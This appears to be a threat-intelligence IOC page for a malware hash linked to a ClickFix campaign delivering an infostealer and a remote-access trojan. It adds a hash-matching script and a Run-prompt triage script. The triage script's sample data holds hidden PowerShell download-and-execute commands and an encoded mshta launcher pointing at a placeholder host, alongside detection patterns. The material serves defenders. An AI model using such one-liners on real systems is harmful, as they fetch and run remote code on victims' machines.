SHA256 · Medium · Signal 84/100
a61a2efaad92e5888cf20cb2bf96b9874eac5d5aadf6456c76926ab90cbe74d7
First Seen: Nov 14, 2025 (214d ago)
Last Seen: May 25, 2026 (22d ago)
Reports: 7 source reports
Confidence: 84% (medium)
VirusTotal: 60/76 detections
Found in 7 reports. Confidence: medium. · Confidence scores are heuristic. Verify before acting on results.
SHA-256 Hash: SHA-256 file hash, the primary identifier for malware samples.
MISP Category: Artifacts Dropped
Hash Algorithm: SHA256
Confidence: 84%
Signal Score: 84 / 100
IDS Rule: No
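To act on a SHA-256 indicator such as this one, a responder hashes files on a host, compares them against the watch list, and on a match packages the indicator as STIX 2.1 for sharing. The block below is an added example, not code from the feed or from any analysis cited on this record. It uses only the hash on this page; the demo file contents and the second watch-list digest are constructed so that the scan produces a hit offline.

```python
"""Match files on disk against a SHA-256 IOC and emit a STIX 2.1 indicator.

Added example; not code from the feed or from any campaign analysis.
PAGE_IOC is the hash on this record. DEMO_CONTENT and DEMO_HASH are
constructed so the walk below finds a hit without the real sample.
"""
import hashlib
import json
import os
import tempfile
import uuid
from datetime import datetime, timezone
from pathlib import Path

# The SHA-256 from this IOC record.
PAGE_IOC = "a61a2efaad92e5888cf20cb2bf96b9874eac5d5aadf6456c76926ab90cbe74d7"

# Constructed demo content; its digest is added to the watch list for the demo.
DEMO_CONTENT = b"hello"
DEMO_HASH = hashlib.sha256(DEMO_CONTENT).hexdigest()


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large binaries use constant memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def normalize(hexdigest):
    """Feeds publish hashes in mixed case; compare lowercase and reject junk."""
    d = hexdigest.strip().lower()
    if len(d) != 64 or any(c not in "0123456789abcdef" for c in d):
        raise ValueError(f"not a SHA-256 hex digest: {hexdigest!r}")
    return d


def scan_tree(root, iocs):
    """Return [(path, digest)] for every regular file whose SHA-256 is on the watch list."""
    watch = {normalize(h) for h in iocs}
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            if p.is_symlink() or not p.is_file():
                continue  # skip symlinks so a link into a pseudo-filesystem cannot stall the scan
            d = sha256_file(p)
            if d in watch:
                hits.append((str(p), d))
    return hits


def stix_timestamp():
    """STIX 2.1 requires UTC, 'Z' suffix and millisecond precision on created/modified."""
    now = datetime.now(timezone.utc)
    return now.strftime("%Y-%m-%dT%H:%M:%S.") + f"{now.microsecond // 1000:03d}Z"


def stix_indicator(hexdigest, name="SHA-256 file hash indicator", confidence=None):
    """Build a STIX 2.1 Indicator SDO whose pattern matches the file hash."""
    ts = stix_timestamp()
    d = normalize(hexdigest)
    obj = {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "name": name,
        "indicator_types": ["malicious-activity"],
        "pattern": f"[file:hashes.'SHA-256' = '{d}']",
        "pattern_type": "stix",
        "valid_from": ts,
    }
    if confidence is not None:
        obj["confidence"] = int(confidence)  # STIX confidence is an integer 0..100
    return obj


def stix_bundle(objects):
    """Wrap SDOs in a STIX 2.1 Bundle."""
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": list(objects)}


def demo_scan():
    """Write two constructed files to a temp dir and scan them; returns the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "dropped.bin").write_bytes(DEMO_CONTENT)   # constructed "dropped artifact"
        Path(tmp, "benign.txt").write_bytes(b"nothing here")
        return scan_tree(tmp, [PAGE_IOC, DEMO_HASH])


if __name__ == "__main__":
    hits = demo_scan()
    for path, digest in hits:
        print("HIT", path, digest)
    bundle = stix_bundle(stix_indicator(d, confidence=84) for _, d in hits)
    print(json.dumps(bundle, indent=2))
```

The hash is normalized before comparison because the same indicator arrives in upper and lower case from different feeds, and the confidence carried into the STIX object is the heuristic score from the record, which downstream consumers should treat the same way the page does: as a hint, not a verdict.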
Threat Context
Category tags (including MITRE ATT&CK technique IDs):
abuse, acr, acr stealer, active scan, amadey, amatera, amatera stealer, amigo, amsi bypass, amsiscanbuffer, anydesk, appdata, apt activity, bad reputation, browser data, brute force, bypass, c++ malware, c2 communication, cisa kev, command & control, command and control, command execution, credential access, credential harvesting, credential stealing, credential stuffing, credential theft, crypter, crypter payload, crypto wallets, crypto-wallets, cryptocurrency, cryptocurrency threats, cryptojacking, cyber, data exfiltration, data store exposure, detect-debug-environment, dragonforce, evalusion campaign, evasion, evasion techniques, exe, executable file, exploit available, exploitation activity, file, file-hash, finance, google chrome, hunters, identity & access exploitation, in the wild, indicator, information stealer, information stealing malware, information theft, infostealer, injection activity, json, mal, malicious powershell activity, malware, malware campaign, malware delivery, malware deployment campaign, malware distribution, malware-as-a-service, manager, manager zip, mobile threat, netsupport rat, ngate android malware, operating system, payload delivery, peexe, peru, phatom raven, phishing, phishing attack, process injection, ransomware, rat, remote access, remote access trojan, remote services, researched, resource hijacking, run prompt, scripting attacks, sheldio, sneaky malware, social engineering, south america, stealer, stealer c2, t1003, t1005, t1020, t1021, t1021.001, t1027, t1041, t1053.005, t1055, t1056.001, t1059, t1059.001, t1059.003, t1069.001, t1071, t1071.001, t1078, t1078.002, t1082, t1083, t1086, t1105, t1106, t1119, t1132.001, t1140, t1185, t1204, t1204.002, t1218.005, t1219, t1486, t1496, t1497, t1547.001, t1553.002, t1555, t1560, t1566, t1566.001, t1566.002, t1566.003, t1573.001, t1573.002, threat actor, threat response, tor node, unit, vidar, vulnerability scan, wallet, win32 malware, windows malware, xloader
Activity Timeline (peak: 2026-05-25)
24h: 0 (dormant)
7d: 0 (dormant)
30d: 1 (minimal)
3mo: 1 (minimal)
Threat Score: 84 (High Risk)
Description
In November 2025, the EVALUSION campaign was identified using ClickFix to gain initial access and deploy two key pieces of malware: Amatera Stealer and NetSupport RAT. Amatera Stealer is a rebranded variant of ACR (AcridRain) Stealer, which was previously marketed as Malware-as-a-Service by a threat actor identified as SheldIO until its source code was sold in 2024. The analysis indicates that attackers use social engineering via ClickFix to manipulate victims into executing malicious commands through the Windows Run prompt, which leads to the deployment of Amatera and, later, of NetSupport Manager RAT, a legitimate remote management tool that is often abused for unauthorized remote access. This record files the hash under the MISP category Artifacts Dropped, i.e. a file written to disk during the infection chain rather than a network indicator.
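The Run-prompt step described above leaves a host artifact a responder can triage: commands typed into Win+R are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as values a, b, c, ... holding "<command>\1", with MRUList giving the slots most recent first. The block below is an added example, not code from the feed or from the EVALUSION analysis. It parses a constructed RunMRU snapshot, decodes any PowerShell -EncodedCommand payload, and maps hits to technique IDs that are tagged on this record; the commands, hosts and URLs in the snapshot are placeholders, not campaign payloads.

```python
"""Triage Windows Run-prompt history for ClickFix-style command execution.

Added example; not code from the feed or from the EVALUSION analysis.
Commands typed into the Run dialog (Win+R) are stored under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU as
values a, b, c, ... of the form "<command>\\1"; MRUList lists the slots
most recent first. SAMPLE_RUNMRU is constructed: its commands and URLs
are placeholders, not real campaign payloads.
"""
import base64
import binascii
import re

# Constructed snapshot in the shape a registry query of RunMRU returns.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x.txt).Content"\\1',
    "c": "powershell -enc "
         + base64.b64encode('Start-Process mshta "http://example.invalid/p.hta"'.encode("utf-16-le")).decode()
         + "\\1",
}

# Interpreters worth flagging when launched from the Run prompt, with the
# ATT&CK technique tagged on this record for each.
INTERPRETERS = {
    "powershell": "T1059.001", "pwsh": "T1059.001", "cmd": "T1059.003",
    "mshta": "T1218.005",
}
# (pattern, label, technique or None); techniques are those tagged on this record.
SUSPICIOUS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window", None),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "no profile", None),
    (re.compile(r"-(?:ep|ex|executionpolicy)\s+bypass", re.I), "execution policy bypass", None),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "inline eval", None),
    (re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I),
     "remote fetch", "T1105"),
    (re.compile(r"https?://", re.I), "URL in command", "T1105"),
    (re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), "encoded command", "T1027"),
]
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def parse_runmru(snapshot):
    """Return [(slot, command)] most-recent-first with the trailing '\\1' removed."""
    out = []
    for slot in snapshot.get("MRUList", ""):
        raw = snapshot.get(slot)
        if raw is None:
            continue
        out.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return out


def decode_encoded_command(command):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = ENCODED.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(snapshot):
    """Flag Run-prompt entries that launch an interpreter with suspicious arguments."""
    findings = []
    for slot, cmd in parse_runmru(snapshot):
        parts = cmd.strip().split(None, 1)
        if not parts:
            continue
        exe = parts[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
        if exe not in INTERPRETERS:
            continue
        decoded = decode_encoded_command(cmd)
        text = cmd if decoded is None else cmd + "\n" + decoded
        flags, techniques = [], {"T1204", INTERPRETERS[exe]}  # typed by the user: User Execution
        for pat, label, tech in SUSPICIOUS:
            if pat.search(text):
                flags.append(label)
                if tech:
                    techniques.add(tech)
        if decoded:  # a second-stage interpreter hidden inside the encoded payload
            for name, tech in INTERPRETERS.items():
                if re.search(rf"\b{name}\b", decoded, re.I):
                    techniques.add(tech)
        if flags:
            findings.append({"slot": slot, "command": cmd, "decoded": decoded,
                             "flags": flags, "techniques": sorted(techniques)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_RUNMRU):
        print(f["slot"], f["techniques"], f["flags"])
        print("   ", f["command"])
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

On a live host the snapshot comes from the current user's hive (for example `reg query` against the key above, or a parsed NTUSER.DAT from an image); the decoder matters because ClickFix lures frequently hand the victim an encoded one-liner, and the readable command is what tells you which second stage was fetched.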